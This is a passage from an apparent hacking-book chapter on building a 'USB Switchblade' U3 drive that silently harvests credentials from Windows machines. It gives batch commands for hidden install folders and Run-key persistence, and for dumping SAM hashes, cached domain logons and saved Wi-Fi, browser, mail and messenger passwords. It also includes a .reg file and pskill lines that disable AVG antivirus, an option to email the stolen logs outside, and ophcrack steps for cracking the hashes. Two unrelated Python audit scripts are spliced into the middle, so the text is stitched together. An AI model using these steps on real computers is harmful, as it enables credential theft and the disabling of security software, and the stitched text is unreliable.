drives that are inserted into the installed system. The supported version of the Hacksaw
program is included with the download package provided in the next section.
MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY
.\HS\*.* "%appdata%\sbs" /y 2>&1
A www.gnu.org/copyleft/gpl.html
34 CHAPTER 2 USB Switchblade
REG ADD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.
lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\
Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.
exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstall
KB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat"
"%appdata%\sbs\send.bat" 2>&1
COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\
stunnel.conf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.
conf" 2>&1
ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB
"%appdata%\sbs" +s +h 2>&1
.\SBS.lnk & .\SBS2.lnk
WirelessKeyView
WirelessKeyView is a utility from Nirsoft. It can recover all wireless network secu-
rity keys for the Wireless Encryption Protocol (WEP) and Wi-Fi Protected Access
(WPA) that are contained in the Wireless Zero Configuration (XP) and WLAN
AutoConfig (Vista) services on a system. This tool’s command options give you the
ability to sort or export to various formats. The following Web site can be checked if
updated versions are required: www.nirsoft.net/utils/wireless_key.html.
.\wifike.exe /stext %tmplog% >> %log% 2>&1
Password Dump
PwDump is a name given to several types of programs with multiple developers
that are able to provide an output of the NT LAN Manager (Windows NTLM) and
LAN Manager (LM) password hashes for user accounts contained in the local secu-
rity accounts manager (SAM). This tool is used to extract raw passwords from a
Windows SAM file. Once you have extracted the hashes from the Windows SAM
file, an alternate program can be used to find the exact text passwords used on the
system. The next section will describe the additional tools required to interpret the
hashes derived from this program. The most recent version of the software can be
found at www.tarasco.org/security/pwdump_7/index.html.
.\pwdump 127.0.0.1 >> %log% 2>&1
Fizzgig Dump
Fgdump was developed for use in environments with AV and other detection software
enabled. It wraps the PwDump and CacheDump utilities to minimize the problems that
arise when running these tools individually. The development of this tool appears to
be in full swing, with extensive auditing targeted for Windows domains and their
respective trust relationships (additional tools are required for this). This tool is
provided in addition to the individual PwDump and CacheDump utilities in case problems
are encountered running them natively. The updated release of this software can be
found at http://swamp.foofus.net/fizzgig/fgdump/downloads.htm.
%U3%\fgdump.exe" -c >> %log% 2>&1
Network Password Recovery
Network Password Recovery allows an administrator to recover all passwords (includ-
ing domain) of the current logged-on user used for establishing connections to network
shares. It can also retrieve .NET Passport passwords for sites if they were saved in this
manner. External credentials files can also be parsed so long as the last logged-on
account password is known. This is another utility written by Nirsoft, and current ver-
sions can be found at www.nirsoft.net/utils/network_password_recovery.html.
.\netpass.exe /stext %tmplog% >> %log% 2>&1
Mail Password Viewer
Mail PassView is a tool that can reveal the password and account details for numer-
ous e-mail clients. The supported clients include Outlook Express, Microsoft Outlook
2000/2002/2003/2007, Windows Mail, Windows Live Mail, IncrediMail, Eudora,
Netscape 6.x/7.x (without master password encryption), Mozilla Thunderbird (with-
out master password encryption), Group Mail Free, Yahoo! Mail (if stored in Yahoo!
Messenger application), Hotmail/MSN mail (if stored in MSN/Windows/Live
Messenger application), and Gmail (if stored in Gmail Notifier application, Google
Desktop, or by Google Talk). Once again, this is another Nirsoft tool and updates can
be found at www.nirsoft.net/utils/mailpv.html.
.\mailpv.exe /stext %tmplog% >> %log% 2>&1
Firefox Password Recovery
FirePassword is a tool designed to decrypt the credentials from the Mozilla Firefox
database. Firefox records username and password details for every Web site the
user authorizes and stores them in an encrypted database. If a master password is
set, it will be needed; without it, the tool will not be able to display these
credentials. Some sites also prevent the saving of passwords in a browser, which is
another limitation that should be considered. Check the following site for the most
recent updates to this tool: www.securityxploded.com/download/FirePassword_bin.zip.
.\FirePassword.exe >> %log% 2>&1
Internet Explorer Password Viewer
Internet Explorer PassView is another tool from Nirsoft designed to provide pass-
word management, which can reveal passwords that have been stored in the browser.
This utility can recover three different types of passwords: AutoComplete, HTTP
authentication passwords, and FTP. It gathers these by parsing Windows protected
storage, the registry, and a credential file. Known issues exist starting with Internet
Explorer 7.0 because Microsoft is changing the way in which some passwords are
stored, so limitations may be encountered. The most recent versions of this software
include the ability to read offline or external sources if you know the password of the
last logged-on user for this profile. Check this site if updated versions are required:
www.nirsoft.net/utils/internet_explorer_password.html.
.\iepv.exe /stext %tmplog% >> %log% 2>&1
Messenger Password Recovery
MessenPass is another password recovery tool that reveals the passwords of com-
mon instant-messenger applications. It can be used only to recover the passwords
for the current logged-on user on the local computer, and it only works if you chose
the “remember your password” option in the programs. This tool cannot be used for
grabbing the passwords from other user profiles. When running MessenPass, it auto-
matically detects the instant-messenger applications installed on the target system,
decrypts the passwords, and displays all user credentials found. This Nirsoft tool can
be found at www.nirsoft.net/utils/mspass.html.
.\mspass.exe /stext %tmplog% >> %log% 2>&1
CacheDump
CacheDump was designed to capture the credentials of a domain user who is cur-
rently logged on to a system. It targets Windows’ inherent offline caching techniques
performed by the Local Security Authority (LSA) system service. This service uses
a cached version of the password to allow users to log on when a domain controller
is unavailable to authenticate them. This tool creates a temporary service, allowing it
to grab hash values of passwords, which can be taken offline for later cracking. The
most current release of this program can be found at www.hacktoolrepository.com/
category/9/Passwords.
.\cachedump.exe >> %log% 2>&1
Protected Storage Password Viewer
Protected Storage PassView is yet another Nirsoft tool designed to divulge passwords
housed on a system stored by Internet Explorer, Outlook Express, and MSN Explorer.
This tool also has the capability to reveal information stored in the AutoComplete
strings of Internet Explorer. If an update for this tool is required, check the following
location: www.nirsoft.net/utils/pspv.html.
.\pspv.exe /stext %tmplog% >> %log% 2>&1
Product Key Recovery
ProduKey, a tool from Nirsoft, presents the product identifier and the associated
keys for Microsoft products installed on the system. Microsoft Office 2003/2007,
Exchange, SQL, and even operating system (including Windows 7) keys can
be extracted using this. It is also capable of gathering keys from remote systems
if permissible and includes additional customizable command options for your
convenience. The following location contains additional information regarding this
tool: www.nirsoft.net/utils/product_cd_key_viewer.html.
.\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1
History Scraper
A preconfigured VB script has been included in the Switchblade download package
to provide a summary of the most recently viewed Web sites on the target machine.
No additional files or updates are required in order for this to complete.
CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1
Windows Updates Lister
WinUpdatesList will display all of the Windows updates, including hotfixes, that
are installed in a local or remote system. Hotfix information includes the associated
files, and the user interface will even provide a link to the Microsoft site, which
includes detailed information related to the specific update. This tool applies to
Windows 98, ME, 2000, and XP but is not yet available for Vista and later. The fol-
lowing Web site contains additional information regarding this tool: www.nirsoft.
net/utils/wul.html.
.\wul.exe /stext %tmplog% >> %log% 2>&1
Network Statistics
The network statistics command displays active network connections, listening ports,
associated processes, and a variety of other network statistics. This tool is already
included on all relevant Windows systems.
netstat.exe -abn >> %log% 2>&1
Port Query
Portqry.exe is a command-line utility that is often used to troubleshoot network con-
nectivity issues. Portqry.exe is included on systems based on Windows 2000, XP,
and 2003 and can be downloaded for use on others. The utility reports the status
of Transmission Control Protocol and User Datagram Protocol ports on a desired
machine. It is able to report listening, nonlistening, and filtered ports individually by
listing or in a sequential range. The most updated version of this tool can be found at
www.microsoft.com/downloads/details.aspx?familyid=89811747-c74b-4638-a2d5-
ac828bdc6983&displaylang=en.
.\portqry -local -l %tmplog% >> %log% 2>&1
The tools described above are already contained in the USB Switchblade pack-
age download provided in the next section. If you intend to use the tools included
in Switchblade, it would be in your best interest to familiarize yourself with each
independently. Each of these tools provides additional parameters and customization
options depending on your needs. The attack recreation included below will provide
you with a basic understanding of how these are commonly deployed.
Switchblade Assembly
As previously stated, the ultimate goal of USB Switchblade is to simplify the recov-
ery of critical information from computers running Windows 2000 or later. With
administrator access, it is able to retrieve password hashes, LSA secrets, IP informa-
tion, and much more. This section will demonstrate how to build and deploy a U3
flash drive with the -=GonZor=- SwitchBlade technique.
Note
If User Account Control (UAC) is enabled on Vista or Windows 7, the user will be prompted
to allow the execution of the tools within the Switchblade. A dialogue box stating
“Windows need your permission to continue” will be displayed. This must be disabled on
these systems when building the Switchblade and to enable automated retrieval on target
systems.
This first set of directions included will build a default version of Switchblade.
These are provided for quick reference should you encounter an updated release
of the Switchblade software, which may better suit your needs. Customization
instructions will follow these procedures to allow you to update or add to existing
distributions.
1. The Switchblade v2.0 payload needs to be downloaded. This package can be found
at http://rapidshare.com/files/113283682/GonZors_SwitchBlade-V2.0.zip.
2. If you are using an XP system, the Universal Customizer software previously
downloaded for Chapter 1, “USB Hacksaw,” can be used to complete this process.
If you have Vista or 7 systems, download the compatible Universal Customizer at
http://rapidshare.de/files/40767219/Universal_Customizer_1.4.0.2.rar.html.
Warning
If any AV applications are running on the machine you are using to download or create the
U3 Switchblade, problems will be encountered. Most antivirus software will recognize the
tools contained in Switchblade as malicious and will attempt to remove them. To head off
any problems, disable antivirus on the system you are using to build Switchblade.
3. Create a separate directory for each program you just downloaded and unzip the
files into their respective folders.
4. Place the U3CUSTOM.iso from the Switchblade folder into the bin folder of the
Universal Customizer directory.
5. Insert your U3 USB drive.
6. Launch the Universal Customizer by executing Universal_Customizer.exe.
7. Follow the on-screen instructions and prompts until complete, accepting the
default selections where applicable. Steps 9–13 in the “How to Recreate the
Attack” section of Chapter 1, “USB Hacksaw,” provides detailed directions and
screenshot illustrations for these steps.
8. If you receive a failure at the end, repeat steps 5 and 6 at least three times. If
failures persist, download and install the latest version of the LaunchPad installer
(lpinstaller.exe) at http://mp3support.sandisk.com/downloads/LPInstaller.exe.
Sporadic results can be encountered with this program as well, so let your tena-
cious side shine through.
9. Once you have successfully applied the Switchblade ISO using the Universal
Customizer process, place the SBConfig.exe and ip.shtml from the Switchblade
directory onto the removable disk partition and run SBConfig.exe.
10. Enable the desired tools by checking the appropriate boxes and entering all
other required information. After making your changes, select Update Config.
The next section will describe these and other steps in more detail and pro-
vide caveats for deployments on related systems. This completes a basic USB
Switchblade installation for the GonZor package.
Customizing the Original Payload
The steps below will walk you through updating an existing tool within a payload.
Testing of the package previously prescribed produced some errors when trying to
parse the updated target applications. Changes were made to the wget command
to properly output an external IP address in the log file. Additional procedures are
provided to disable AVG antivirus to smooth the automated initialization of the
Switchblade script. In order to modify the original payload, you will need to extract
the files from the GonZor ISO. This process can be used to update any of the tools
used in the payload. The following will be needed to complete this customization.
• Any U3 drive
• A working version of the GonZor USB Switchblade
• The current version of PsTools or the PsKill utility specifically. The download
location for this was provided in Chapter 1, “USB Hacksaw.”
• Download and install the current version of MagicISO. This tool can be down-
loaded from www.magiciso.com/.
Note
At the time of this writing, the most recent version of the Switchblade payload was v2.0.
1. Create a separate folder for each program you just downloaded and unzip the files
into their respective folders.
2. Create a new directory to extract the original GonZor ISO. We will refer to this
directory as %GONZOR_ISO%\ in the following steps.
3. Copy the U3CUSTOM.iso from the GonZor SwitchBlade payload directory into
%GONZOR_ISO%\.
4. Open MagicISO and browse to the U3CUSTOM.iso. Right-click the U3CUSTOM.
iso file and extract to %GONZOR_ISO%\.
5. Copy pskill.exe to %GONZOR_ISO%\SYSTEM\SRC.
Note
AVG 9.0 service name has changed in the registry. For this reason, there are two driver
entries specified in the file for both AVG 8.5 and AVG 9.0 in the next step. If you encounter
a newer release of AVG, this registry file may need to be adjusted to work in an updated
environment.
6. Next, create a .reg file to disable the AVG antivirus services and set them to take
no action in the event of a service failure. Copy and paste the text given below
into a Notepad file and save it as AVKill.reg. Any other services of concern can
be added to this file for disablement. The Start and FailureAction values included
here can be duplicated for the additional services.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg9wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00
7. Save this Notepad file as AVKill.reg to %GONZOR_ISO%\SYSTEM\SRC\.
8. Locate the go.bat file in %GONZOR_ISO%\SYSTEM\SRC. Right-click and
select Edit, and then find the 0.dat line in this file.
9. In the go.bat, enter the following text. Killing of other processes is included as a
fail-safe due to inconsistencies found between the various versions of Windows
operating systems. If you added other services to the registry file in step 6, their
associated processes must be included here.
ECHO --------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [AVGKill] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO AVG services have been disabled >> %log% 2>&1
REGEDIT /s .\avkill.reg >> %log% 2>&1
.\pskill -t avgam.exe >> %log% 2>&1
.\pskill -t avgrsx.exe >> %log% 2>&1
.\pskill -t avgwdsvc >> %log% 2>&1
.\pskill -t avgnsx.exe >> %log% 2>&1
.\pskill -t avgcsrvx.exe >> %log% 2>&1
.\pskill -t avgtray.exe >> %log% 2>&1
.\pskill -t agrsmsvc.exe >> %log% 2>&1
.\pskill -t avgwdsvc.exe >> %log% 2>&1
)
IF EXIST %include%\19.dat" (
ECHO -------------------------------------------------------------
10. Search and find the 1.dat line in the same file. Place a “;” at the start of these
commands used for the wget. The wget commands should now appear like the
below statements.
;.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
;ECHO. >> %tmplog% 2>&1
;COPY %log%+%tmplog%* %log% >> NUL
;DEL /f /q %tmplog% >NUL
11. Insert the following wget command line just above the old wget command.
.\wget -q -O - http://whatismyip.com/automation/n09230945.asp >> %log% 2>&1
12. Save and close the file.
13. Copy and paste the entire contents of %GONZOR_ISO%\ (except the
U3CUSTOM.iso) into the U3Custom folder of the Universal Customizer.
Tip
Ensure that the Universal Customizer\U3Custom directory is empty before you copy the
updated files into it. Only files that you want included in the final ISO should be contained
in this folder.
14. Run the ISOCreate.cmd in the root of the Universal Customizer directory to create
the updated ISO. The output provided should appear similar to Figure 2.1.
15. Press any key when prompted to complete the build.
16. The updated ISO will be placed into the bin directory automatically.
17. Insert your U3 drive and run the Universal_Customizer.exe to load the updated
ISO.
18. Follow the prompts until complete, accepting the default selections, and provide a
password when required. Steps 9–13 in the “How to Recreate the Attack” section
of Chapter 1, “USB Hacksaw,” provide screenshot illustrations for this process.
19. Insert the U3 drive and place the SBConfig.exe (this file is located in the
unpacked Switchblade payload) onto the removable disk partition and run it.
20. Select the tools from the payload that you want to run by checking the boxes,
as shown in Figure 2.2. The output of this script will be sent to a log file on
the removable disk partition of the U3 drive (System/Logs/%computername%/*.log)
after it is run.
Figure 2.1: Universal Customizer ISOCreate Command Window
Figure 2.2: GonZor Payload Configuration Options Dialogue
21. Optionally, you can enter a valid mail account, password, and connection infor-
mation if you want the Switchblade logs and Hacksaw payloads to be sent to an
external source, as shown in Figure 2.2.
22. The payload will be disabled by default. When you are finished editing, click
Update Config and then Quit. Save the configuration when prompted.
23. You have now established a customized version of the -=GonZor=- Payload
v2.0 on your U3 smart drive, which can be used to retrieve all kinds of goodies
once it is plugged into a computer with administrative privileges.
As you can see, it wasn’t very difficult to customize a smart U3 USB. Use
extreme caution when anyone requests to insert his or her USB flash drive into
your system. The person could easily disguise a legitimate payload as a misdirection
tactic while his or her Switchblade silently performs its magic. Unattended
XP, 2003, Vista, and 7 systems with password-protected screen savers engaged
will not allow autorun to initiate, thus preventing the programmatic process
without authentication. If the screen saver is not protected by a password, autorun
can be engaged once the desktop becomes active. Windows 95, 98, and ME
screen savers can be circumvented, but these systems are scarcely seen in this
day and age.
Most of the tools worked correctly for Vista, with some success attained
on 7 systems. User interaction was required on both to initiate the script after
Switchblade insertion. To achieve better results on these systems, you will need
to find updated releases of each tool for the respective target operating system or
application.
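From the defender's side, the Hacksaw installation script earlier in this section (the REG ADD that autostarts sbs.lnk from a $NtUninstallKB931337$ folder) and the AVKill.reg file in step 6 of the customization (Start=4 plus a FailureActions blob whose three actions are all "take no action") leave registry traces that an export can be audited for. The Python script below is an added example, not code from the book or from the Switchblade package: it parses a Regedit 5.00 export, decodes the FailureActions structure, and reports watched AV services that are disabled or set to ignore failures, along with any Run value that starts something from a hotfix uninstall folder. The sample export is constructed (the avg8wd values repeat the page's AVKill.reg data), and the watched-service list and the checks themselves are assumptions for illustration.

```python
import re
import struct

# Constructed sample export, not a dump from a real host. The avg8wd entry
# repeats the AVKill.reg values from the text; the USBMedia value mirrors the
# Hacksaw REG ADD line; Spooler and ctfmon.exe are ordinary entries for contrast.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
  00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"USBMedia"="C:\\WINDOWS\\$NtUninstallKB931337$\\sbs.lnk"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

SERVICE_DISABLED = 4   # Start=dword:4 means the service never starts
SC_ACTION_NONE = 0     # SC_ACTION type 0: take no action on failure
WATCHED_SERVICES = ('avg8wd', 'avg9wd')   # assumed: the AV services this host should run


def parse_reg(text):
    """Parse a Regedit 5.00 export into {key_path: {value_name: (kind, data)}}.
    Handles dword, hex (with backslash line continuation) and string values."""
    text = re.sub(r'\\\r?\n[ \t]*', '', text)   # rejoin wrapped hex: lines
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
        elif line.startswith('"') and current is not None:
            name, _, raw = line[1:].partition('"=')
            if raw.startswith('dword:'):
                keys[current][name] = ('dword', int(raw[6:], 16))
            elif raw.startswith('hex:'):
                keys[current][name] = ('hex', bytes.fromhex(raw[4:].replace(',', '')))
            elif raw.startswith('"') and raw.endswith('"'):
                keys[current][name] = ('sz', raw[1:-1].replace('\\\\', '\\'))
    return keys


def failure_actions_all_none(blob):
    """Decode the registry form of SERVICE_FAILURE_ACTIONS: cActions sits at
    offset 12 and the SC_ACTION (type, delay) array begins at offset 20."""
    if len(blob) < 20:
        return False
    count = struct.unpack_from('<I', blob, 12)[0]
    types = [struct.unpack_from('<II', blob, 20 + 8 * i)[0]
             for i in range(count) if 20 + 8 * i + 8 <= len(blob)]
    return bool(types) and all(t == SC_ACTION_NONE for t in types)


def audit_reg_export(keys, watched=WATCHED_SERVICES):
    """Return findings: watched services disabled or set to ignore failures,
    and Run-key autostarts that point into a $NtUninstall...$ hotfix folder."""
    findings = []
    for path, values in keys.items():
        parts = path.split('\\')
        leaf = parts[-1]
        if 'Services' in parts and leaf.lower() in watched:
            if values.get('Start', (None, None))[1] == SERVICE_DISABLED:
                findings.append(f'{leaf}: service disabled (Start=4)')
            fa = values.get('FailureActions')
            if fa and failure_actions_all_none(fa[1]):
                findings.append(f'{leaf}: failure recovery set to take no action')
        if leaf.lower() == 'run':
            for name, (_, data) in values.items():
                if re.search(r'\$NtUninstall[^\\]*\$', str(data)):
                    findings.append(f'Run value {name} starts from hotfix folder: {data}')
    return findings


if __name__ == '__main__':
    for finding in audit_reg_export(parse_reg(SAMPLE_REG)):
        print(finding)
```

On the sample it reports three findings: avg8wd disabled, avg8wd recovery set to none, and the USBMedia autostart. On a real host the input would be the output of reg export for the Services key and the Run key, and the watched list would hold whatever endpoint-protection services that host is expected to run.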
Windows Password Hashes
Once you have successfully deployed the Switchblade on a target system,
retrieving the passwords from the hashes provided might be required. You will
need the Switchblade log file located on the removable disk partition of the
U3 flash drive (system/logs/%computername%/*.log). The Windows passwords
are hashed using LM and NTLM hashes. The hashes are stored in c:\windows\
system32\config\SAM. To get the passwords, you need to use a Windows pass-
word cracker to convert the LM hash format. The following steps will walk
you through the installation, configuration, and retrieval of a password using
ophcrack.
1. Download ophcrack from http://ophcrack.sourceforge.net/.
2. Double-click the installation executable and click Next, as seen in Figure 2.3.
3. Select all components, as shown in Figure 2.4, and click Next.
4. Install in the default directory, as indicated in Figure 2.5, and click Next.
5. Install the tables in the default directory, as depicted in Figure 2.6, and click
Install.
Figure 2.3: ophcrack Installation Dialogue
Figure 2.4: ophcrack Installation Dialogue
Figure 2.5: ophcrack Installation Dialogue
Figure 2.6: ophcrack Installation Dialogue
6. The tool will now be installed and the rainbow tables will be downloaded. A progress
bar should reflect the remaining installation, as seen in Figure 2.7.
7. Click Next when prompted, as portrayed in Figure 2.8.
8. Click Finish to complete the install when prompted, as depicted in Figure 2.9.
9. If errors are encountered during the load or you just need additional tables, these
can be downloaded from the following locations.
• Download the XP Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/XP%20free/tables_xp_free_small.zip/download and
http://sourceforge.net/projects/ophcrack/files/tables/XP%20free/tables_xp_
free_fast.zip/download.
• Download the Vista Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/Vista%20free/tables_vista_free.zip/download.
10. Unzip the files once they are downloaded.
11. Launch ophcrack and click Tables, as shown in Figure 2.10.
12. You should now have a pane displaying the expected tables, which are in Figure 2.11.
Select the required table and click Install. XP free fast was used in this example.
13. Navigate to the location where you saved the table, as seen in Figure 2.12, and
click Install. Keep in mind that storing the rainbow tables on a fast medium like
a hard disk or flash drive will significantly speed up the cracking process. Avoid
using tables from CD-ROMs or DVDs.
Figure 2.7: ophcrack Installation Dialogue
Figure 2.8: ophcrack Installation Dialogue
Figure 2.9: ophcrack Installation Dialogue
Figure 2.10: ophcrack Application
Figure 2.11: ophcrack Program Table Selection
Figure 2.12: ophcrack Program Table Selection
14. Next, copy and paste the results from the [Dump SAM PWDUMP] section of
the Switchblade log file on the U3 USB drive into a separate Notepad file.
15. Save the file in a known location.
16. In ophcrack, click Load and select PWDUMP file, as depicted in Figure 2.13.
17. Navigate to where you saved the Notepad file (step 15) and select it.
18. The LM hash from the file will be displayed in ophcrack, as shown in Figure 2.14.
19. Select Crack and wait for the results. The status will be displayed as shown in
Figure 2.15.
Given the number of possible password permutations, some results may take
longer than others. A 15-character password with good complexity could be very
difficult to crack, if even possible. Additional rainbow tables can be downloaded and
applied for more thorough analysis of a given hash.
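As the section notes, the LM and NTLM hashes in the [Dump SAM PWDUMP] log section are unsalted, which is what makes precomputed tables effective against them. The Python script below is an added example, not code from the book or from ophcrack: it parses pwdump-format lines, computes the NT hash (MD4 over the UTF-16LE password, implemented here per RFC 1320 because hashlib does not always expose MD4) and, as an administrator's audit of such a dump, flags accounts that still store an LM hash, have an empty password, or match a banned-password list by direct hash lookup. The sample dump lines and the banned list are constructed.

```python
import struct

MASK = 0xFFFFFFFF


def _rot(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(msg):
    """MD4 per RFC 1320; the Windows NT hash is MD4 over the UTF-16LE password."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = len(msg) * 8
    msg = msg + b'\x80' + b'\x00' * ((55 - len(msg)) % 64) + struct.pack('<Q', bit_len)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    k3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack('<16I', msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                      # round 1
            a = _rot(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                      # round 2
            a = _rot(a + g(b, c, d) + x[k2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                      # round 3
            a = _rot(a + (b ^ c ^ d) + x[k3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack('<4I', *h)


def nt_hash(password):
    """Unsalted: equal passwords give equal hashes, so a table lookup suffices."""
    return md4(password.encode('utf-16le')).hex()


EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'  # LM field when no LM hash is stored
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'  # NT hash of the empty password


def parse_pwdump(line):
    """pwdump line layout: user:rid:lm_hash:nt_hash:::"""
    user, rid, lm, nt = line.strip().split(':')[:4]
    return {'user': user, 'rid': int(rid), 'lm': lm.lower(), 'nt': nt.lower()}


def audit(lines, banned):
    """Return {user: [findings]} for a pwdump excerpt; 'banned' is the list of
    passwords the organisation forbids (assumed policy input)."""
    table = {nt_hash(p): p for p in banned}      # same lookup idea as a rainbow table
    result = {}
    for line in lines:
        rec = parse_pwdump(line)
        notes = []
        if rec['lm'] != EMPTY_LM:
            notes.append('LM hash stored (enable the NoLMHash policy)')
        if rec['nt'] == EMPTY_NT:
            notes.append('empty password')
        elif rec['nt'] in table:
            notes.append('password is on the banned list: ' + table[rec['nt']])
        result[rec['user']] = notes
    return result


# Constructed sample dump in pwdump format (not taken from any real system).
SAMPLE_DUMP = [
    'Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::',
    'Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::',
    'legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::',
]
BANNED = ['password', 'Welcome1', 'letmein']   # constructed policy list

if __name__ == '__main__':
    for user, notes in audit(SAMPLE_DUMP, BANNED).items():
        print(user, notes or ['ok'])
```

The Administrator and legacy entries in the sample share one NT hash, which is the first thing to look for in a real dump: identical hashes mean identical passwords. Enabling the NoLMHash policy, or enforcing passwords of 15 characters or more, stops the LM hash from being stored at all, which is the limit the text above describes.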
Figure 2.13: ophcrack Program Load Options
Figure 2.14: ophcrack Program LM Hash Display